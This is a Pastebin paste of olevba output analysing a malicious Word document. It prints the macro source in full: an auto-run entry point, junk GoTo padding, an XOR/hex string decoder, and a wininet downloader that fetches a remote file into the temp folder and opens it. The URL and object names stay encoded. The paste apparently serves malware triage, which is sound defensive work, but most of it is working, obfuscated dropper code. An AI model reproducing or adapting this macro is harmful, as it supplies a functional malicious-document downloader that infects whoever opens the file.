SHARE
TWEET

Malicious Word macro

dynamoo Mar 18th, 2015 280 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- nwncon~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: nwncon~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. vsvsvsaaaa110I
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Private Sub RIV3333gO()
  30. GoTo wefwefwefweaafewf
  31. wefwefwefweaafewf:
  32. GoTo RERee33EGsssssgvfrgrg
  33. RERee33EGsssssgvfrgrg:
  34. GoTo EN299NEIKISKKKK7
  35. EN299NEIKISKKKK7:
  36. GoTo EN785NEIKISKKKK71
  37. EN785NEIKISKKKK71:
  38. GoTo ENNE435534IKISKKKK72
  39. ENNE435534IKISKKKK72:
  40. GoTo ULLL333LLAKhhwshefg
  41. ULLL333LLAKhhwshefg:
  42.  
  43. End Sub
  44. Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
  45.     Dim asasas1 As Long
  46.     Dim asasas1O As String
  47.     Dim asasas10 As Integer
  48.    
  49.     Dim efefe332d As Integer
  50. For efefe332d = 0 To 0
  51. If efefe332d = 25 Then End
  52. Next efefe332d
  53.    
  54.     Dim asasas101 As Integer
  55.  
  56.     For asasas1 = 1 To (Len(ghdhdhe8) / 2)
  57.         asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
  58.         asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
  59.         Dim dwww343a As Integer
  60.         For dwww343a = 0 To 0
  61.         If dwww343a = 4 Then End
  62.         Next dwww343a
  63.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
  64.          Dim efe33q299 As Integer
  65.         For efe33q299 = 0 To 0
  66.         If efe33q299 = 4 Then End
  67.         Next efe33q299
  68.     Next asasas1
  69.    memak8of = asasas1O
  70. End Function
  71.  
  72. Private Sub IHYbeffeVuJC()
  73. GoTo asefawf3
  74. asefawf3:
  75. GoTo sgr467gfh
  76. sgr467gfh:
  77. GoTo d45854shfhfshf
  78. d45854shfhfshf:
  79. GoTo rhhrshrsth455
  80. rhhrshrsth455:
  81. GoTo uykoEuxdddd
  82. uykoEuxdddd:
  83. GoTo rVTBqKcccccArFPEEEEEyylmMVi
  84. rVTBqKcccccArFPEEEEEyylmMVi:
  85. GoTo IhzKeee2ascfacas2zw
  86. IhzKeee2ascfacas2zw:
  87. GoTo IhzKeee2svs2333zw
  88. IhzKeee2svs2333zw:
  89. GoTo IhzKeee223334css44zw
  90. IhzKeee223334css44zw:
  91.  
  92. End Sub
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. +------------+-------------+-----------------------------------------+
  96. | Type       | Keyword     | Description                             |
  97. +------------+-------------+-----------------------------------------+
  98. | Suspicious | Chr         | May attempt to obfuscate specific       |
  99. |            |             | strings                                 |
  100. | Suspicious | Xor         | May attempt to obfuscate specific       |
  101. |            |             | strings                                 |
  102. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  103. |            |             | be used to obfuscate strings (option    |
  104. |            |             | --decode to see all)                    |
  105. +------------+-------------+-----------------------------------------+
  106. -------------------------------------------------------------------------------
  107. VBA MACRO Module11.bas
  108. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module11'
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. Private Sub RIVgO()
  111. GoTo myMuLxBcPMGZVtOntBESoqzJEi
  112. myMuLxBcPMGZVtOntBESoqzJEi:
  113. GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
  114. kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
  115. GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
  116. NRsSeqnJfEwsDUkFsCaUyAhAG:
  117. GoTo jstrwTahLZYosuLbSDlnHk
  118. jstrwTahLZYosuLbSDlnHk:
  119. GoTo zivUUwERtNsQiIuoGpMwG
  120. zivUUwERtNsQiIuoGpMwG:
  121. GoTo UlAHJSqlOQxDQfT
  122. UlAHJSqlOQxDQfT:
  123.  
  124. End Sub
  125. Private Sub vuykqyOpo()
  126. GoTo NrVTBqKAr
  127. NrVTBqKAr:
  128. GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
  129. yylmMViKeIhzKzwqIFMQdZlBwyHfL:
  130. GoTo msLTIokkjoZRZD
  131. msLTIokkjoZRZD:
  132. GoTo gjmeCgKuqfzqguEnn
  133. gjmeCgKuqfzqguEnn:
  134. GoTo oKQlSkVaAolfxuRnL
  135. oKQlSkVaAolfxuRnL:
  136.  
  137. End Sub
  138. Public Function adrMOYidGVoIc()
  139. GoTo AzEpipThgwzCu
  140. AzEpipThgwzCu:
  141. GoTo bKtvPsx
  142. bKtvPsx:
  143. GoTo qDrdEbaBjAmqQqBvNLi
  144. qDrdEbaBjAmqQqBvNLi:
  145. GoTo UQctH
  146. UQctH:
  147. GoTo bytQYEZemcHQRPUsyF
  148. bytQYEZemcHQRPUsyF:
  149. GoTo wMPSKkyrcJLg
  150. wMPSKkyrcJLg:
  151. GoTo bYGTttUdqRmQpGhHS
  152. bYGTttUdqRmQpGhHS:
  153.  
  154. End Function
  155. Public Function Nk3Tflh()
  156. GoTo irOJnpV
  157. irOJnpV:
  158. GoTo DsYTTRQIOVn
  159. DsYTTRQIOVn:
  160. GoTo dSVNmPusaOjZPeoQQ
  161. dSVNmPusaOjZPeoQQ:
  162. GoTo luGiChFYjYUOheBl
  163. luGiChFYjYUOheBl:
  164. GoTo xJabwyHfLpFms
  165. xJabwyHfLpFms:
  166. GoTo IokkjoZRZDePgjmeCgK
  167. IokkjoZRZDePgjmeCgK:
  168. GoTo fzqguEnnaM
  169. fzqguEnnaM:
  170.  
  171. End Function
  172. Private Function QlSkVaAo85668lfxu()
  173.  
  174. End Function
  175. Public Function Nad121112rMOYidGVoI6c()
  176. GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
  177. AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
  178. GoTo qQqBvNLi
  179. qQqBvNLi:
  180. GoTo UQctHQbytQY
  181. UQctHQbytQY:
  182. GoTo GTttUdqRmQpGhHSMfNkT
  183. GTttUdqRmQpGhHSMfNkT:
  184. GoTo hsJZgirO
  185. hsJZgirO:
  186.  
  187. End Function
  188. Public Function psvssqqqqqqY()
  189. GoTo PoePoePPP
  190. PoePoePPP:
  191. GoTo IokkjoKKLHHnaM
  192. IokkjoKKLHHnaM:
  193. GoTo QlSkVSsSMmnMxuRnLR
  194. QlSkVSsSMmnMxuRnLR:
  195. GoTo ssssscaaaa
  196. ssssscaaaa:
  197. GoTo GAAAAFFFFFc
  198. GAAAAFFFFFc:
  199. GoTo rA09181hgwzCuS
  200. rA09181hgwzCuS:
  201. GoTo KtvPs
  202. KtvPs:
  203.  
  204. End Function
  205. Private Function UqD34343434rdEbaBjAm()
  206.  
  207. End Function
  208. Private Function vNLigbrgrgRH8856H()
  209.  
  210. End Function
  211. Public Sub tQY34cHQ()
  212.  
  213. End Sub
  214. Public Function y5000S()
  215. GoTo cJLg6666sssssNbYGT
  216. cJLg6666sssssNbYGT:
  217. GoTo UdS334y5y5pGhHS
  218. UdS334y5y5pGhHS:
  219. GoTo NkTflaaAAa5555JZgirOJnpV
  220. NkTflaaAAa5555JZgirOJnpV:
  221.  
  222. End Function
  223. Public Function DsYTTRQIO()
  224.  
  225. End Function
  226. Public Function vssvsef3wtg3gxfvx()
  227. GoTo sdssssaas
  228. sdssssaas:
  229. GoTo sdvsS54738EG
  230. sdvsS54738EG:
  231. GoTo oZRZD44444eP
  232. oZRZD44444eP:
  233. GoTo meCvvvvvvgKuqf
  234. meCvvvvvvgKuqf:
  235.  
  236. End Function
  237.  
  238.  
  239.  
  240.  
  241. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  242. ANALYSIS:
  243. +------------+-------------+-----------------------------------------+
  244. | Type       | Keyword     | Description                             |
  245. +------------+-------------+-----------------------------------------+
  246. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  247. |            |             | be used to obfuscate strings (option    |
  248. |            |             | --decode to see all)                    |
  249. +------------+-------------+-----------------------------------------+
  250. -------------------------------------------------------------------------------
  251. VBA MACRO Module3.bas
  252. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module3'
  253. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  254. Option Explicit
  255.  
  256. #If VBA7 And Win64 Then
  257. Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  258. Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  259. Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  260. Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  261. #Else
  262. Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  263. Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  264. Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  265. Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  266. #End If
  267.  
  268. Private Const MBL = 8162
  269. Private Const AAN As String = "Mod2"
  270. Private Const IOTD = 1
  271. Private Const IFNCW = &H4000000
  272. Public Function LopapunTIK1(ByVal sURL As String, ByVal sFileName As String) As Boolean
  273.     #If VBA7 And Win64 Then
  274.         Dim hOpen As LongPtr, hFile As LongPtr
  275.     #Else
  276.         Dim hOpen As Long, hFile As Long
  277.     #End If
  278.     Dim Ret As Long
  279.     Dim sBuff As String * MBL, sData As String
  280.     Dim iFile As Integer, dData As Double
  281.     hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0)
  282.     If hOpen = 0 Then
  283.         Exit Function
  284.     End If
  285.     hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0)
  286.     If hFile = 0 Then
  287.         dData = 0
  288.     Else
  289.         feefeROZ hFile, sBuff, MBL, Ret
  290.         sData = sBuff
  291.         Do While Ret <> 0
  292.             feefeROZ hFile, sBuff, MBL, Ret
  293.             sData = sData + Mid(sBuff, 1, Ret)
  294.         Loop
  295.         dData = Len(sData): iFile = FreeFile
  296.         Open sFileName For Binary Access Write Lock Write As #iFile
  297.         Put #iFile, , sData: Close #iFile
  298.     End If
  299.     figal1221 hFile
  300.     figal1221 hOpen
  301.     sData = ""
  302.     If dData Then
  303.         LopapunTIK1 = True
  304.     End If
  305. End Function
  306. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  307. ANALYSIS:
  308. +------------+----------------+-----------------------------------------+
  309. | Type       | Keyword        | Description                             |
  310. +------------+----------------+-----------------------------------------+
  311. | Suspicious | Lib            | May run code from a DLL                 |
  312. | Suspicious | Open           | May open a file                         |
  313. | Suspicious | Write          | May write to a file (if combined with   |
  314. |            |                | Open)                                   |
  315. | Suspicious | Put            | May write to a file (if combined with   |
  316. |            |                | Open)                                   |
  317. | Suspicious | Binary         | May read or write a binary file (if     |
  318. |            |                | combined with Open)                     |
  319. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  320. |            |                | may be used to obfuscate strings        |
  321. |            |                | (option --decode to see all)            |
  322. | IOC        | wininet.dll    | Executable file name                    |
  323. +------------+----------------+-----------------------------------------+
  324. -------------------------------------------------------------------------------
  325. VBA MACRO UserForm1.frm
  326. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/UserForm1'
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. (empty macro)
  329. -------------------------------------------------------------------------------
  330. VBA MACRO Class1.cls
  331. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Class1'
  332. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  333. (empty macro)
  334. -------------------------------------------------------------------------------
  335. VBA MACRO Module1.bas
  336. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module1'
  337. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  338. (empty macro)
  339. -------------------------------------------------------------------------------
  340. VBA MACRO Module2.bas
  341. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module2'
  342. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  343. Private Const GRxvSG = "300C061F0F5D2717061F0C1503370A0B0D"
  344. Private Const jryj = "3F1E02180A1F090A4E454B131A26"
  345. Private Const sdioph34 = "0B101703595C49171B1E040409374D00065C090049051F1D4B131A26"
  346. Private Const Mcdsef42 = "3007111A13070F09115D231F0E26301D1007061E29051C160602"
  347. Private Const vjf788eS = "Ccdcscsfgvsevb"
  348.  
  349.  
  350.  
  351.  
  352.  
  353.  
  354. Sub vsvsvsaaaa110I()
  355. Dim FSOOO2
  356. Dim sder53dfbhRF As Integer
  357. For sder53dfbhRF = 0 To 0
  358. If sder53dfbhRF = 5 Then End
  359. Next sder53dfbhRF
  360. Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  361. Dim fffffF
  362. Const fffffFID = 2
  363. Dim DdDd22A As Integer
  364. For DdDd22A = 0 To 0
  365. If DdDd22A = 5 Then End
  366. Next DdDd22A
  367. Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
  368. Dim Ee11 As Integer
  369. For Ee11 = 0 To 0
  370. If Ee11 = 5 Then End
  371. Next Ee11
  372. EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
  373. Dim sil3489df As Integer
  374. For sil3489df = 0 To 0
  375. If sil3489df = 5 Then End
  376. Next sil3489df
  377. Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  378. Dim seswwwsa As Integer
  379. For seswwwsa = 0 To 0
  380. If seswwwsa = 5 Then End
  381. Next seswwwsa
  382. If FSObject2.FileExists(EdEdE111) Then
  383. FSObject2.DeleteFile EdEdE111
  384. End If
  385. If LopapunTIK1(memak8of(vjf788eS, sdioph34), EdEdE111) Then
  386. End If
  387. Set SSSS = Nothing
  388. If FSObject2.FileExists(EdEdE111) Then
  389. End If
  390. Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
  391. SASASA.Open EdEdE111
  392. End Sub
  393.  
  394.  
  395.  
  396.  
  397.  
  398.  
  399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  400. ANALYSIS:
  401. +------------+--------------+-----------------------------------------+
  402. | Type       | Keyword      | Description                             |
  403. +------------+--------------+-----------------------------------------+
  404. | Suspicious | CreateObject | May create an OLE object                |
  405. | Suspicious | Open         | May open a file                         |
  406. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  407. |            |              | be used to obfuscate strings (option    |
  408. |            |              | --decode to see all)                    |
  409. +------------+--------------+-----------------------------------------+
  410. -------------------------------------------------------------------------------
  411. VBA MACRO Module5.bas
  412. in file: nwncon~1.doc - OLE stream: u'Macros/VBA/Module5'
  413. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  414.  
  415. Public Sub PkD4040Sccbg()
  416.  
  417. End Sub
  418. Private Sub IHYbe505VuJC()
  419. GoTo TZmwR230fSEgCdKcNRsSeYqnJf
  420. TZmwR230fSEgCdKcNRsSeYqnJf:
  421. GoTo sDUk444FsCaUyA
  422. sDUk444FsCaUyA:
  423. GoTo GODjstrwT6904lnHkpCzivUUw
  424. GODjstrwT6904lnHkpCzivUUw:
  425. GoTo tNsQiIjuoGp873Tz
  426. tNsQiIjuoGp873Tz:
  427. GoTo uykqyO888855poEux
  428. uykqyO888855poEux:
  429. GoTo rVTBqKAr357FPyylmMVi
  430. rVTBqKAr357FPyylmMVi:
  431. GoTo IhzK4444zw
  432. IhzK4444zw:
  433. GoTo FdMQdZlB0258CYajGoQNTnvkPL
  434. FdMQdZlB0258CYajGoQNTnvkPL:
  435. GoTo PAtAfFrPpPpHKNFeHmVR
  436. PAtAfFrPpPpHKNFeHmVR:
  437.  
  438. End Sub
  439. Private Sub RIV1541414gO()
  440. GoTo myMuLsaaaESoqzJEi
  441. myMuLsaaaESoqzJEi:
  442. GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
  443. kDxnScceeeeeCmUQrTZmwRfSEgCBd:
  444. GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
  445. NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
  446. GoTo jstrwT2352525ahLZYosuLbSDlnHk
  447. jstrwT2352525ahLZYosuLbSDlnHk:
  448. GoTo zivUUw44oGpMwG
  449. zivUUw44oGpMwG:
  450. GoTo UlAHJS444444qlOQxDQfT
  451. UlAHJS444444qlOQxDQfT:
  452.  
  453. End Sub
  454. Private Sub vuyk111111qyOpo()
  455. GoTo NrV1010TBqKAr
  456. NrV1010TBqKAr:
  457. GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
  458. yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
  459. GoTo msLTIok444kjoZRZD
  460. msLTIok444kjoZRZD:
  461. GoTo gjmeCgKu555qfzqguEnn
  462. gjmeCgKu555qfzqguEnn:
  463. GoTo oKQlSkVaA768olfxuRnL
  464. oKQlSkVaA768olfxuRnL:
  465.  
  466. End Sub
  467. Public Function adrMOY7777idGVoIc()
  468. GoTo AzEpipThgwsdve4zCu
  469. AzEpipThgwsdve4zCu:
  470. GoTo bKtv4444Psx
  471. bKtv4444Psx:
  472. GoTo qDrdEbaBj534745674AmqQqBvNLi
  473. qDrdEbaBj534745674AmqQqBvNLi:
  474. GoTo UQct874H
  475. UQct874H:
  476. GoTo bytQYE0990099ZemcHQRPUsyF
  477. bytQYE0990099ZemcHQRPUsyF:
  478. GoTo wMPSKk333yrcJLg
  479. wMPSKk333yrcJLg:
  480. GoTo bYG23232TttUdqRmQpGhHS
  481. bYG23232TttUdqRmQpGhHS:
  482.  
  483. End Function
  484. Public Function Nk3121212Tflh()
  485. GoTo irO5789JnpV
  486. irO5789JnpV:
  487. GoTo DsYTTR3333QIOVn
  488. DsYTTR3333QIOVn:
  489. GoTo dSVNmPusa565656OjZPeoQQ
  490. dSVNmPusa565656OjZPeoQQ:
  491. GoTo luGiChFYjYUO99999heBl
  492. luGiChFYjYUO99999heBl:
  493. GoTo xJabwyHfLpF66666ms
  494. xJabwyHfLpF66666ms:
  495. GoTo Io44kkjoZRZDePgj54meCgK
  496. Io44kkjoZRZDePgj54meCgK:
  497. GoTo fz343333222MMMaM
  498. fz343333222MMMaM:
  499.  
  500. End Function
  501. Private Function QlSkGhHHGgglfxu()
  502.  
  503. End Function
  504. Public Function psvssEEEqqqqqqY()
  505. GoTo PoeP001199PPP
  506. PoeP001199PPP:
  507. GoTo OPDK333339ja
  508. OPDK333339ja:
  509. GoTo JabwyU444444IOTYhFms
  510. JabwyU444444IOTYhFms:
  511. GoTo IokkjoKKLHH55555naM
  512. IokkjoKKLHH55555naM:
  513. GoTo QlSkVSsSM66666mnMxuRnLR
  514. QlSkVSsSM66666mnMxuRnLR:
  515. GoTo s77777sssscaaaa
  516. s77777sssscaaaa:
  517. GoTo GAAAAFFFFFc
  518. GAAAAFFFFFc:
  519. GoTo rA09181hg88888wzCuS
  520. rA09181hg88888wzCuS:
  521. GoTo KtvP999999s
  522. KtvP999999s:
  523.  
  524. End Function
  525. Private Function UqD34343000000dEbaBjAm()
  526.  
  527. End Function
  528. Private Function vNLigbrg1010108856H()
  529.  
  530. End Function
  531. Public Sub tQY34212121cHQ()
  532.  
  533. End Sub
  534. Public Function y5012121200S()
  535. GoTo cJLg666wewEEENbYGT
  536. cJLg666wewEEENbYGT:
  537. GoTo UdSWRRrrRRTT5y5pGhHS
  538. UdSWRRrrRRTT5y5pGhHS:
  539. GoTo NkTflaaAAaYyYyYyJnpV
  540. NkTflaaAAaYyYyYyJnpV:
  541.  
  542. End Function
  543. Public Function DsYT3332222TRQIO()
  544.  
  545. End Function
  546. Public Function vssvs234567gxfvx()
  547. GoTo sdsssNnNnsaas
  548. sdsssNnNnsaas:
  549. GoTo sdvsS5KkKk4738EG
  550. sdvsS5KkKk4738EG:
  551. GoTo oZRZD44UuUuUu444eP
  552. oZRZD44UuUuUu444eP:
  553. GoTo meCvvvvvvgKuqf
  554. meCvvvvvvgKuqf:
  555.  
  556. End Function
  557.  
  558. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  559. ANALYSIS:
  560. +------------+-------------+-----------------------------------------+
  561. | Type       | Keyword     | Description                             |
  562. +------------+-------------+-----------------------------------------+
  563. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  564. |            |             | be used to obfuscate strings (option    |
  565. |            |             | --decode to see all)                    |
  566. +------------+-------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top